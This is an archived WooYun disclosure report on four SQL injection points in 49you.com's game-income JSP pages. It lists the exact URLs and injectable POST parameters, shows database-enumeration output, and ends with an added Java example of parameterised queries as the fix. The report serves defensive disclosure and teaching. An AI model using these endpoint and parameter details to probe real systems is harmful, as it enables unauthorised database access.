
Vulnerability Summary

Defect ID: wooyun-2015-0132767

Title: Game security: four SQL injection points on a Shanghai 49you site (bundled)

Vendor: 49you.com

Author: hh2014

Submitted: 2015-08-09 00:17

Fixed: 2015-09-26 10:30

Published: 2015-09-26 10:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-08-09: Details sent to the vendor; awaiting vendor handling
2015-08-12: Vendor confirmed; details disclosed to the vendor only
2015-08-22: Details disclosed to core white hats and relevant domain experts
2015-09-01: Details disclosed to regular white hats
2015-09-11: Details disclosed to intern white hats
2015-09-26: Details disclosed to the public

Brief description:

As titled.

Detailed description:

Four injection points with multiple injectable parameters; the first three are time-based blind injections.
Injection point 1:

http://dj.49you.com/web/tab/manage.jsp?action=updatesave&id=11&type=2
POST parameters:
Submit=%e6%9b%b4%e6%96%b0&gamename=umNWC3sW
The gamename parameter is injectable.
The id parameter is injectable.
The type parameter is injectable.


Injection point 2:

http://dj.49you.com/web/tab/QdGameIncome.jsp
POST parameters:
appname=K3LpTenr&beginTime=2015-08-08&endTime=2015-08-08&spname=%e5%8c%97%e4%ba%ac%e5%88%9b%e6%84%8f%e6%af%94%e7%89%b9%e4%bf%a1%e6%81%af%e6%8a%80%e6%9c%af%e6%9c%89%e9%99%90%e5%85%ac%e5%8f%b8
The appname parameter is injectable.
The beginTime parameter is injectable.


Injection point 3:

http://dj.49you.com/web/tab/SKGameIncome.jsp
POST parameters:
beginTime=YKhEUkTW&cpName=%e7%88%b1%e8%b5%a2&endTime=2015-08-08&gameNamestr=%e8%b5%a2%e8%af%9d%e8%b4%b9%e8%bf%9e%e8%bf%9e%e7%9c%8b
The beginTime parameter is injectable.
The cpName parameter is injectable.
The endTime parameter is injectable.
The gameNamestr parameter is injectable.


Injection point 4:

http://dj.49you.com/web/ltsjyx_income.jsp
POST parameters:
beginTime=-1&endTime=1
The beginTime parameter is injectable.
The endTime parameter is injectable.

Proof of vulnerability:

web application technology: Nginx
back-end DBMS: Microsoft SQL Server 2012
current user: 'sp'
current database: 'SP'
current user is DBA: False
available databases [17]:
[*] Administration
[*] blacklist
[*] Company
[*] DataBack
[*] master
[*] model
[*] msdb
[*] new_system
[*] NZIformation
[*] ReportServer
[*] ReportServerTempDB
[*] shouYou
[*] SP
[*] SP2
[*] tempdb
[*] Test
[*] wap_game
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2012
Database: SP
[108 tables]

Fix recommendation:

Filter and validate the request parameters.
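As an added illustration of the fix recommended above (this is example code, not code from the report or from 49you), the following JDBC pattern shows the concatenation that makes a date-range endpoint such as ltsjyx_income.jsp injectable next to a hardened version that validates beginTime/endTime as calendar dates and binds them as typed parameters. The table and column names (ltsjyx, stat_date, income) are assumed.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.time.LocalDate;
import java.time.format.DateTimeParseException;

public class IncomeQuery {

    // Vulnerable pattern: the raw request parameters are spliced into the SQL text,
    // so a quote or SQL keyword inside beginTime/endTime changes the query structure.
    // (Table/column names are assumed for illustration.)
    static String vulnerableSql(String beginTime, String endTime) {
        return "SELECT SUM(income) FROM ltsjyx WHERE stat_date BETWEEN '"
                + beginTime + "' AND '" + endTime + "'";
    }

    // Hardened step 1: accept only a strict ISO-8601 calendar date (yyyy-MM-dd).
    // LocalDate.parse rejects anything else, including the "-1" and "1" values
    // seen in the report, and null is rejected explicitly.
    static LocalDate parseDate(String raw) {
        if (raw == null) {
            throw new IllegalArgumentException("missing date parameter");
        }
        try {
            return LocalDate.parse(raw);
        } catch (DateTimeParseException e) {
            throw new IllegalArgumentException("invalid date parameter: " + raw, e);
        }
    }

    // Hardened step 2: the SQL text is constant and the values are bound as DATE
    // parameters, so the database never interprets them as SQL.
    static long totalIncome(Connection conn, String beginTime, String endTime) throws SQLException {
        LocalDate begin = parseDate(beginTime);
        LocalDate end = parseDate(endTime);
        if (end.isBefore(begin)) {
            throw new IllegalArgumentException("endTime is before beginTime");
        }
        String sql = "SELECT SUM(income) FROM ltsjyx WHERE stat_date BETWEEN ? AND ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setDate(1, java.sql.Date.valueOf(begin));
            ps.setDate(2, java.sql.Date.valueOf(end));
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getLong(1) : 0L;
            }
        }
    }
}
```

The same two steps apply to the other reported parameters: free-text values such as gamename or cpName still go through PreparedStatement binding, and numeric ones such as id and type are parsed to integers before use.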

Copyright notice: reproduction must credit the source, hh2014@WooYun


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-08-12 10:28

Vendor reply:

We have confirmed the problem. Thanks to 路人甲.

Latest status:

None yet


Vulnerability Rating:

Comments

  1. 2015-08-19 20:10 | 猫和老鼠 (Passerby | Rank: 4 | Vulnerabilities: 3 | ...)

    Isn't this vendor the scammer who advertised a 30,000 yuan bounty? Nice con.

  2. 2015-08-19 21:20 | 小龙 (Regular white hat | Rank: 1208 | Vulnerabilities: 316 | There is a group of people on WooYun who learn techniques on WooYun and go to some...)

    @猫和老鼠 They won't even send a gift -_- How do people like that get hired?